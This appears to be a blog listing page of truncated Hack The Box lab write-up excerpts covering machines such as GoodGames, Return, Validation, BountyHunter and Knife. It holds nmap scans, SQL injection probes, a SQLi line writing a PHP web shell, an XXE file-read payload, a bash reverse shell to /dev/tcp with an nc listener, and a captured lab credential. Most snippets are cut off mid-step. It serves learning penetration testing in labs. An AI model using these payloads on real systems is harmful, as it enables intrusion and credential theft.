HTB GoodGames

$ nmap -sV -p- goodgames.htb –min-rate 5000 http://goodgames.htb/ We can test if this site is vulnerable to an SQL Injection. If we just add a ‘, we can reach the login page with a registration form. http://internal-administration.goodgames.htb/ We don’t have credentials for this site, but as we’ve confirmed there is an sql injection let’s try to exploit it. First, we need to know how many columns exist.’ union all

HTB Swagshop

$ nmap -p- -sV $sudo nano /etc/hosts Access to http://swagshop.htb/ As we are facing a Magento, we can use Magescan to check it. $ wget $ php magescan.phar scan:all http://swagshop.htb From the magescan report, if we find about patches, the first one is SUPEE-5344. With this poc, you should be able to add an admin user. $ python3 swagshop.htb Access to http://swagshop.htb/index.php/admin The “Froghopper” Attack After

HTB Return

$ nmap -sV -p- -Pn –min-rate 5000 If we add our IP into the Server Address field: $ sudo nc -lvnp 389 We get a connection and the svc-printer password. svc-printer:1edFg43012!! You can read more about this technique here. According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

HTB Validation

$ nmap -p- -v Access to The listbox values are sent to the server into a POST request: username=rffuste&country=Brazil In the response, we get a cookie user This user cookie does not change if multiple requests are performed. SQL Injection We can check if there is an SQL Injection. We have confirmed there is an SQL Injection that we can use. ‘ union select «» INTO OUTFILE ‘/var/www/html/shell.php’– – Now

HTB TheNotebook

$ nmap -A -p- -T4 -v So, a user test exists.What would be the password? test??? Do we have an admin user? We can try to log in with our test user. Test notes After login in, we can observe that there is an AUTH Token. We observe that it is a JWT Token. We can decode it using  Here we can observe several things: RS256

HTB BountyHunter

$ nmap -A -T4 -v Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) As we can observe in Burp, data is URL+base64 encoded. It’s XML data, so could try an XXE. Using Cyberchef ( on we also find : <!DOCTYPE replace [<!ENTITY xxe SYSTEM «php://filter/convert.base64-encode/resource=file_to_use»> ]> We can use to check other files

HTB Love

$ nmap -A -p- -T4 Open ports: 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) ssl-cert: Subject: 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd

HTB Knife

$ nmap $ nmap -p- -v $ whatweb $ searchsploit php 8.1.0-dev $ searchsploit -m php/webapps/ $ python3 $ id Using this exploit we get a reverse but it is not very useful, we can try to get a better one. $ python3 -u -c «/bin/bash -c ‘/bin/bash -i >& /dev/tcp/ 0>&1′»$ sudo nc -lvnp 4444 james@knife:/$ ls james@knife:/$ cd /homejames@knife:/home$ ls james@knife:/home$


$ nmap -A -p- -T4 -Pn Open ports : 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn Dashboard Security Snapshot IP Config Network status Security Snapshot Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if

HTB Explore

Rustscan is a fast port scanner that promises to scan all 65k ports in 3 seconds.We can use it to perform a full port scan and with the results, we can use them in combination with Nmap. $ rustscan -a $ sudo nmap -sV -sC -p 2222,42135,42507,59777 In the port scan, we found different open ports.As usually, ssh port is not a common port to start testing so,